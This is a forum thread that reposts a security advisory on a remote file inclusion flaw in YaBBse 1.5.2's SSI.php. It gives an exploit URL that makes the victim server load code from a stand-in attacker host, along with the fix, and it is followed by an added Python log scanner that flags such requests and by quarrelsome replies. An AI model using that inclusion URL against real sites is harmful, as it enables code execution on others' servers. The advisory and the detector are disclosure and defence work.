Remote code execution in YaBBse 1.5.2 (php version)

CourtneyDS


======[ Overview
YaBB is a widely used bulletin board system.




======[ Problem
One of the files included in the main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
The name of the file is SSI.php.
A similar bug was discovered in the previous version, YaBB 1.5.1.


SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------


We can define the $sourcedir variable through the URL and include some other PHP script, local or remote, if remote inclusion is enabled in the php.ini file ...
The bug is not exploitable if PHP's register_globals is set to off ...


======[ Exploit


Exploit would look like this:

http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com



The attacker would place an Errors.php file on his server ... The included code would get executed on the victim's server ...
The attacker's httpd server should not have PHP enabled because the
script will be parsed before sending it to the victim ...


======[ Solution


Add this line before the include_once() lines mentioned above.



if (!isset($sourcedir)) $sourcedir = "";


======[ Greetz ]======
Greetz goes to hr.hackers and linux .
Special greetz goes to (rand()): BoyScout, h4z4rd, Çòùrtnèy, finis, Sunnis, Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.

** Credit to eLtorO **


Sincerely
CourtneyDS
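
A defender-side check for the request pattern described in the post above, as an added example that is not part of the original post or of YaBB SE: it scans web server access-log lines for requests to SSI.php that carry a sourcedir parameter. The log lines, addresses and host names are constructed, and the verdict labels are names chosen here.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line of a Common/Combined Log Format entry: "METHOD target PROTO"
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
SSI_PATH_RE = re.compile(r'/ssi\.php(?:/|$)', re.I)  # post writes SSI.php and ssi.php
SCHEME_RE = re.compile(r'^\s*[a-z][a-z0-9+.\-]*://', re.I)  # http://, ftp://, ...

def classify(line):
    """Return None, 'local-override' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    if not SSI_PATH_RE.search(unquote(target.path)):
        return None
    verdict = None
    # parse_qsl percent-decodes once, as PHP does before filling $sourcedir.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        if name != 'sourcedir':        # PHP variable names are case-sensitive
            continue
        if SCHEME_RE.match(value):
            return 'remote-include'    # include_once would fetch from another host
        verdict = 'local-override'     # include path redirected on the same host
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every suspicious entry."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (documentation addresses and example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2003:10:01:22 +0000] "GET /yabbse/index.php?board=1 HTTP/1.0" 200 5120',
    '198.51.100.7 - - [12/Mar/2003:10:02:03 +0000] "GET /yabbse/ssi.php?sourcedir=http://files.example.net HTTP/1.0" 200 312',
    '198.51.100.7 - - [12/Mar/2003:10:02:09 +0000] "GET /yabbse/SSI.php?sourcedir=http%3A%2F%2Ffiles.example.net HTTP/1.0" 200 312',
    '203.0.113.5 - - [12/Mar/2003:10:05:41 +0000] "GET /yabbse/SSI.php?sourcedir=/tmp HTTP/1.0" 200 0',
    '192.0.2.10 - - [12/Mar/2003:10:06:00 +0000] "GET /yabbse/SSI.php HTTP/1.0" 200 2048',
]

if __name__ == '__main__':
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```

Access logs record only the query string, so a sourcedir value supplied in a POST body or cookie would not show up in this scan.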
 
rocker_nash
Just out of interest, who the heck is 'eltoro'?

^^ Personally if I were you.. (15 year old high school kid).. pick up a book and learn and don't concern yourself with who is who.. ok little boy ...:

--------------------------------------------------
David :
Thanks for the warning court.


^^ You're more than welcome David ... PHP is a very weak code as some rate it as the ultimate ... <<>> How can it be rated "Tops" when their entire database can be wiped-out in under 12 key strokes ?

Sincerely
CourtneyDS
 
whats she gonna do, tell ya how to do new stuff. damb eyelfixit, ur dumber then you look dude! shut up cuz peeps know you dont know sheout n jus copy n paste to make urself look smart.
 
The day you understand that you can't bully me and you're quite beneath me is the day you'll wake up.

All of this is wack including your responses, she gives out old redundant information and you praise her. I think you're the one that needs to learn something.
 
eyelfixit said:
The day you understand that you can't bully me and you're quite beneath me is the day you'll wake up.

All of this is wack including your responses, she gives out old redundant information and you praise her. I think you're the one that needs to learn something.

how ya bully n ignorant arse like you, ya laugh at em like peeps at you whenever you post sheoit like you know what ur takin about. n the chick aint gonna post new exploits, ah ha ha ha ha damb ur dumb eyelfixit
 
Can you speak English, 'cause I really can't follow your "slang".

What you're saying doesn't make any sense, again!
 